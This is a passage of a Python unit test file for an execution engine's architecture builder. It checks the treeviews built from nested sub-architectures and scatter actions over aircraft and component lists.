    self.dirs_to_del = []
    # Root study namespace used by every test in this class.
    self.namespace = 'MyCase'
    self.study_name = f'{self.namespace}'
    # Fresh execution engine (and its builder factory) per test.
    self.exec_eng = ExecutionEngine(self.namespace)
    self.factory = self.exec_eng.factory
    # System temp dir used as working folder for generated artefacts.
    self.root_dir = gettempdir()
def test_01_build_sub_architecture(self):
    """Build an architecture whose 'Services' node is itself a nested
    sub-architecture, and check the resulting treeview."""
    vb_builder_name = 'Business'
    # Sub-architecture hung under 'Services': Flight Hour/Maintenance with leaves FHS/OSS.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('standard')],
         'Activation': [False, False, False, False], })
    # Top-level architecture: the ('architecture', df) action nests the sub-architecture.
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
         'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
         'Activation': [True, True, False, False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_market_in': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.configure()
    self.exec_eng.load_study_from_input_dict({})
    # Expected treeview: Airbus expands the nested sub-architecture, Boeing stays flat.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Airbus',
                   '\t\t\t|_ Services',
                   '\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t|_ FHS',
                   '\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t|_ OSS',
                   '\t\t|_ Boeing',
                   '\t\t\t|_ AC_Sales', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_02_build_two_sub_architectures(self):
    """Build an architecture with two different nested sub-architectures,
    one of which (the component one) is reused under two parents."""
    vb_builder_name = 'Business'
    # Services sub-architecture (Flight Hour / Maintenance with leaves FHS / OSS).
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('standard')],
         'Activation': [False, False, False, False], })
    # AC_Sales component sub-architecture, reused for both Airbus and Boeing below.
    sub_architecture_component_df = pd.DataFrame(
        {'Parent': ['AC_Sales', 'AC_Sales', 'Airframe', 'Airframe'],
         'Current': ['Propulsion', 'Airframe', 'Wing', 'VTP'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('standard')],
         'Activation': [False, False, False, False], })
    # Top level: Airbus gets Services + AC_Sales, Boeing gets AC_Sales only.
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'Airbus', 'Boeing', 'Airbus'],
         'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline', 'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df),
                    ('architecture', sub_architecture_component_df),
                    ('architecture', sub_architecture_component_df)],
         'Activation': [True, True, False, False, False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_market_in': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.configure()
    self.exec_eng.load_study_from_input_dict({})
    # Expected treeview: the component sub-architecture appears under both actors.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Airbus',
                   '\t\t\t|_ Services',
                   '\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t|_ FHS',
                   '\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t|_ OSS',
                   '\t\t\t|_ AC_Sales',
                   '\t\t\t\t|_ Propulsion',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t\t\t|_ Wing',
                   '\t\t\t\t\t|_ VTP',
                   '\t\t|_ Boeing',
                   '\t\t\t|_ AC_Sales',
                   '\t\t\t\t|_ Propulsion',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t\t\t|_ Wing',
                   '\t\t\t\t\t|_ VTP', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_03_build_sub_sub_architecture(self):
    """Build an architecture nested two levels deep: a sub-sub-architecture
    under OSS, inside the Services sub-architecture."""
    vb_builder_name = 'Business'
    # Deepest level: OSS splits into level 1 / level 2, with level-1 leaves.
    sub_sub_architecture_df = pd.DataFrame(
        {'Parent': ['OSS', 'OSS', 'OSS level 1', 'OSS level 1'],
         'Current': ['OSS level 1', 'OSS level 2', 'OSS level 11', 'OSS level 12'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('standard')],
         'Activation': [False, False, False, False], })
    # Middle level: OSS itself carries the nested sub-sub-architecture.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('architecture', sub_sub_architecture_df)],
         'Activation': [False, False, False, False], })
    # Top level: Services carries the middle sub-architecture.
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
         'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('architecture', sub_architecture_df), ('standard')],
         'Activation': [True, True, False, False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_market_in': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.configure()
    self.exec_eng.load_study_from_input_dict({})
    # Expected treeview: OSS now expands two extra levels deep.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Airbus',
                   '\t\t\t|_ Services',
                   '\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t|_ FHS',
                   '\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t|_ OSS',
                   '\t\t\t\t\t\t|_ OSS level 1',
                   '\t\t\t\t\t\t\t|_ OSS level 11',
                   '\t\t\t\t\t\t\t|_ OSS level 12',
                   '\t\t\t\t\t\t|_ OSS level 2',
                   '\t\t|_ Boeing',
                   '\t\t\t|_ AC_Sales', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_04_build_scatter_architecture(self):
    """Build a 'scatter_architecture' action: the Services sub-architecture
    is replicated once per aircraft in AC_list."""
    vb_builder_name = 'Business'
    # Build map describing how AC_list scatters into per-aircraft nodes.
    mydict = {'input_name': 'AC_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'AC_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
    # Sub-architecture replicated under each aircraft.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Services', 'Services', 'Flight Hour', 'Maintenance'],
         'Current': ['Flight Hour', 'Maintenance', 'FHS', 'OSS'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'), ('standard'), ('standard')],
         'Activation': [False, False, False, False], })
    # Services uses the 4-tuple ('scatter_architecture', map, gather type, sub df).
    architecture_df = pd.DataFrame(
        {'Parent': ['Business', 'Business', 'Airbus', 'Boeing'],
         'Current': ['Airbus', 'Boeing', 'Services', 'AC_Sales'],
         'Type': ['SumValueBlockDiscipline', 'SumValueBlockDiscipline', 'ValueBlockDiscipline',
                  'ValueBlockDiscipline'],
         'Action': [('standard'), ('standard'),
                    ('scatter_architecture', 'AC_list',
                     'SumValueBlockDiscipline', sub_architecture_df),
                    ('standard')],
         'Activation': [True, True, False, False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_market_in': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.configure()
    # Activate Services for three aircraft under Airbus.
    activation_df = pd.DataFrame(
        {'Business': ['Airbus', 'Airbus', 'Airbus'],
         'AC_list': ['AC1', 'AC2', 'AC3'],
         'Services': [True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    # Expected treeview: the sub-architecture is duplicated under AC1..AC3.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Airbus',
                   '\t\t\t|_ Services',
                   '\t\t\t\t|_ AC1',
                   '\t\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t\t|_ FHS',
                   '\t\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t\t|_ OSS',
                   '\t\t\t\t|_ AC2',
                   '\t\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t\t|_ FHS',
                   '\t\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t\t|_ OSS',
                   '\t\t\t\t|_ AC3',
                   '\t\t\t\t\t|_ Flight Hour',
                   '\t\t\t\t\t\t|_ FHS',
                   '\t\t\t\t\t|_ Maintenance',
                   '\t\t\t\t\t\t|_ OSS',
                   '\t\t|_ Boeing',
                   '\t\t\t|_ AC_Sales',
                   ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    # Check the scatter discipline's builder class and each scattered node's type.
    self.assertEqual(self.exec_eng.dm.get_disciplines_with_name('MyCase.Business.Airbus.Services')[
        1].scatter_builders.cls.__name__, 'SumValueBlockDiscipline')
    self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.Airbus.Services.AC1')[0].__class__.__name__, 'SumValueBlockDiscipline')
    self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.Airbus.Services.AC2')[0].__class__.__name__, 'SumValueBlockDiscipline')
    self.assertEqual(self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.Airbus.Services.AC3')[0].__class__.__name__, 'SumValueBlockDiscipline')
def test_05_build_scatter_of_scatter(self):
    """Build a nested scatter action (AC_list scattering a component_list
    scatter) and check the tree plus each node's children_list."""
    # Outer scatter map: one node per aircraft in AC_list.
    mydict = {'input_name': 'AC_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'AC_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
    # Inner scatter map: one node per component under each aircraft.
    mydict = {'input_name': 'component_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'component_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('component_list', mydict)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    vb_builder_name = 'Business'
    # AC_Sales action nests one scatter inside another.
    architecture_df = pd.DataFrame(
        {'Parent': ['Business'],
         'Current': ['AC_Sales'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [('scatter', 'AC_list', ('scatter', 'component_list', 'ValueBlockDiscipline'))],
         'Activation': [False]})
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    self.exec_eng.configure()
    self.exec_eng.load_study_from_input_dict({})
    self.exec_eng.display_treeview_nodes()
    # Before any activation input, only the AC_Sales node exists.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ AC_Sales', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    # Default activation_df generated by the builder: empty lists, node active.
    activation_df = pd.DataFrame(
        {'AC_list': [None],
         'component_list': [None],
         'AC_Sales': [True]})
    self.assertDictEqual(activation_df.to_dict(), self.exec_eng.dm.get_value(
        'MyCase.Business.activation_df').to_dict())
    # Activate three aircraft with their component breakdown.
    activation_df = pd.DataFrame(
        {'AC_list': ['AC1', 'AC1', 'AC2', 'AC3'],
         'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe'],
         'AC_Sales': [True, True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    self.exec_eng.display_treeview_nodes(display_variables=True)
    # Expected treeview after activation: aircraft nodes with component children.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ AC_Sales',
                   '\t\t\t|_ AC1',
                   '\t\t\t\t|_ Propulsion',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC2',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC3',
                   '\t\t\t\t|_ Airframe',
                   ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    ac1_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales.AC1')
    acsales_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales')
    # AC1's children are its two components.
    self.assertListEqual([child.get_disc_full_name()
                          for child in ac1_disciplines[0].children_list],
                         ['MyCase.Business.AC_Sales.AC1.Propulsion',
                          'MyCase.Business.AC_Sales.AC1.Airframe'])
    # We have sumdisciplines but also scatter disciplines (which do not
    # have outputs) — hence each AC appears twice in the children list.
    self.assertListEqual([child.get_disc_full_name()
                          for child in acsales_disciplines[0].children_list], ['MyCase.Business.AC_Sales.AC1',
                                                                               'MyCase.Business.AC_Sales.AC2',
                                                                               'MyCase.Business.AC_Sales.AC3',
                                                                               'MyCase.Business.AC_Sales.AC1',
                                                                               'MyCase.Business.AC_Sales.AC2',
                                                                               'MyCase.Business.AC_Sales.AC3'])
    acpropu_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales.AC1.Propulsion')
    # Leaf components have no children.
    self.assertListEqual([child.get_disc_full_name()
                          for child in acpropu_disciplines[0].children_list], [])
def test_06_build_scatter_of_scatter_with_option(self):
    """Same nested scatter as test_05 but with the optional fourth element
    ('FakeValueBlockDiscipline') in the scatter action; also checks that
    adding an aircraft (AC4) rebuilds the tree."""
    # Outer scatter map: one node per aircraft in AC_list.
    mydict = {'input_name': 'AC_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'AC_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
    # Inner scatter map: one node per component under each aircraft.
    mydict = {'input_name': 'component_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'component_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('component_list', mydict)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    vb_builder_name = 'Business'
    # Nested scatter action with the optional extra discipline argument.
    architecture_df = pd.DataFrame(
        {'Parent': ['Business'],
         'Current': ['AC_Sales'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [('scatter', 'AC_list', ('scatter', 'component_list', 'ValueBlockDiscipline'),
                     'FakeValueBlockDiscipline')],
         'Activation': [False]})
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    self.exec_eng.load_study_from_input_dict({})
    self.exec_eng.display_treeview_nodes()
    # Before any activation input, only the AC_Sales node exists.
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ AC_Sales', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    # Default activation_df generated by the builder: empty lists, node active.
    activation_df = pd.DataFrame(
        {'AC_list': [None],
         'component_list': [None],
         'AC_Sales': [True]})
    self.assertDictEqual(activation_df.to_dict(), self.exec_eng.dm.get_value(
        'MyCase.Business.activation_df').to_dict())
    # Activate three aircraft with their component breakdown.
    activation_df = pd.DataFrame(
        {'AC_list': ['AC1', 'AC1', 'AC2', 'AC3'],
         'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe'],
         'AC_Sales': [True, True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    self.exec_eng.display_treeview_nodes(display_variables=True)
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ AC_Sales',
                   '\t\t\t|_ AC1',
                   '\t\t\t\t|_ Propulsion',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC2',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC3',
                   '\t\t\t\t|_ Airframe',
                   ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    ac1_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales.AC1')
    # check if discipline from first scatter taking in account
    assert len(ac1_disciplines) == 2
    assert isinstance(ac1_disciplines[0], ValueBlockDiscipline)
    assert isinstance(ac1_disciplines[1], SoSDisciplineScatter)
    acsales_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales')
    # AC1's children are its two components.
    self.assertListEqual([child.get_disc_full_name()
                          for child in ac1_disciplines[0].children_list],
                         ['MyCase.Business.AC_Sales.AC1.Propulsion',
                          'MyCase.Business.AC_Sales.AC1.Airframe'])
    # We have sumdisciplines but also scatter disciplines (which do not
    # have outputs) — hence each AC appears twice in the children list.
    self.assertListEqual([child.get_disc_full_name()
                          for child in acsales_disciplines[0].children_list], ['MyCase.Business.AC_Sales.AC1',
                                                                               'MyCase.Business.AC_Sales.AC2',
                                                                               'MyCase.Business.AC_Sales.AC3',
                                                                               'MyCase.Business.AC_Sales.AC1',
                                                                               'MyCase.Business.AC_Sales.AC2',
                                                                               'MyCase.Business.AC_Sales.AC3'])
    acpropu_disciplines = self.exec_eng.dm.get_disciplines_with_name(
        'MyCase.Business.AC_Sales.AC1.Propulsion')
    # Leaf components have no children.
    self.assertListEqual([child.get_disc_full_name()
                          for child in acpropu_disciplines[0].children_list], [])
    # Add AC4 and reload: the tree must pick up the new aircraft.
    activation_df = pd.DataFrame(
        {'AC_list': ['AC1', 'AC1', 'AC2', 'AC3', 'AC4'],
         'component_list': ['Propulsion', 'Airframe', 'Airframe', 'Airframe', 'Airframe'],
         'AC_Sales': [True, True, True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ AC_Sales',
                   '\t\t\t|_ AC1',
                   '\t\t\t\t|_ Propulsion',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC2',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC3',
                   '\t\t\t\t|_ Airframe',
                   '\t\t\t|_ AC4',
                   '\t\t\t\t|_ Airframe',
                   ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
def test_07_build_scatter_under_sub_architecture(self):
    """Build a scatter action inside a nested sub-architecture and check
    that configuring twice before providing AC_list does not break it."""
    vb_builder_name = 'Business'
    # Scatter map: one node per aircraft in AC_list.
    mydict = {'input_name': 'AC_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'AC_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
    # Sub-architecture whose Flight Hour node scatters over AC_list.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Airbus'],
         'Current': ['Flight Hour'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [('scatter', 'AC_list', 'ValueBlockDiscipline')],
         'Activation': [False], })
    architecture_df = pd.DataFrame(
        {'Parent': ['Business'],
         'Current': ['Airbus'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [('architecture', sub_architecture_df)],
         'Activation': [False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.configure()
    # Double configure without ac_list can mess with archi builder
    self.exec_eng.configure()
    # Activate three aircraft under Flight Hour.
    activation_df = pd.DataFrame(
        {'AC_list': ['AC1', 'AC2', 'AC3'],
         'Flight Hour': [True, True, True],
         'Airbus': [True, True, True]})
    self.exec_eng.load_study_from_input_dict(
        {'MyCase.Business.activation_df': activation_df})
    exp_tv_list = [f'Nodes representation for Treeview {self.namespace}',
                   f'|_ {self.namespace}',
                   f'\t|_ {vb_builder_name}',
                   '\t\t|_ Airbus',
                   '\t\t\t|_ Flight Hour',
                   '\t\t\t\t|_ AC1',
                   '\t\t\t\t|_ AC2',
                   '\t\t\t\t|_ AC3', ]
    exp_tv_str = '\n'.join(exp_tv_list)
    assert exp_tv_str == self.exec_eng.display_treeview_nodes()
    # NOTE(review): leftover debug print after the assertion — candidate for removal.
    print(self.exec_eng.display_treeview_nodes())
def _test_08_build_scatter_under_scatter_architecture(self):
    '''
    Build scatter under scatter_architecture is not possible yet
    We have to manage properly the namespaces to have this capability

    NOTE: the leading underscore keeps this test disabled (pytest/unittest
    only collect names starting with 'test'); it documents the intended
    behaviour once the capability exists.
    '''
    vb_builder_name = 'Business'
    # Inner scatter map: one node per aircraft in AC_list.
    mydict = {'input_name': 'AC_list',
              'input_type': 'string_list',
              'input_ns': 'ns_public',
              'output_name': 'AC_name',
              'scatter_ns': 'ns_ac'}
    self.exec_eng.smaps_manager.add_build_map('AC_list', mydict)
    # Outer scatter map: one branch per actor in Actor_list.
    actor_map_dict = {'input_name': 'Actor_list',
                      'input_type': 'string_list',
                      'input_ns': 'ns_public',
                      'output_name': 'Actor_name',
                      'scatter_ns': 'ns_actor'}
    self.exec_eng.smaps_manager.add_build_map('Actor_list', actor_map_dict)
    # Sub-architecture containing a scatter — the unsupported combination.
    sub_architecture_df = pd.DataFrame(
        {'Parent': ['Business'],
         'Current': ['Flight Hour'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [('scatter', 'AC_list', 'ValueBlockDiscipline')],
         'Activation': [False], })
    architecture_df = pd.DataFrame(
        {'Parent': [None],
         'Current': ['Business'],
         'Type': ['SumValueBlockDiscipline'],
         'Action': [
             ('scatter_architecture', 'Actor_list', 'SumBusinessActorValueBlockDiscipline', sub_architecture_df)],
         'Activation': [False], })
    builder = self.factory.create_architecture_builder(
        vb_builder_name, architecture_df)
    self.exec_eng.factory.set_builders_to_coupling_builder(
        builder)
    # Namespaces required by the value-block disciplines; all mapped onto the study.
    self.exec_eng.ns_manager.add_ns_def({'ns_vbdict': self.study_name,
                                         'ns_public': self.study_name,
                                         'ns_segment_services': self.study_name,
                                         'ns_services': self.study_name,
                                         'ns_services_ac': self.study_name,
                                         'ns_seg': self.study_name,
                                         'ns_ac': self.study_name,
                                         'ns_coc': self.study_name,
                                         'ns_data_ac': self.study_name,
                                         'ns_business_ac': self.study_name,
                                         'ns_rc': self.study_name,
                                         'ns_market': self.study_name,
                                         'ns_business': f'{self.study_name}.Business',
                                         'ns_Airbus': f'{self.study_name}.Business.Airbus',
                                         'ns_Boeing': f'{self.study_name}.Business.Boeing'})
    self.exec_eng.load_study_from_input_dict({})
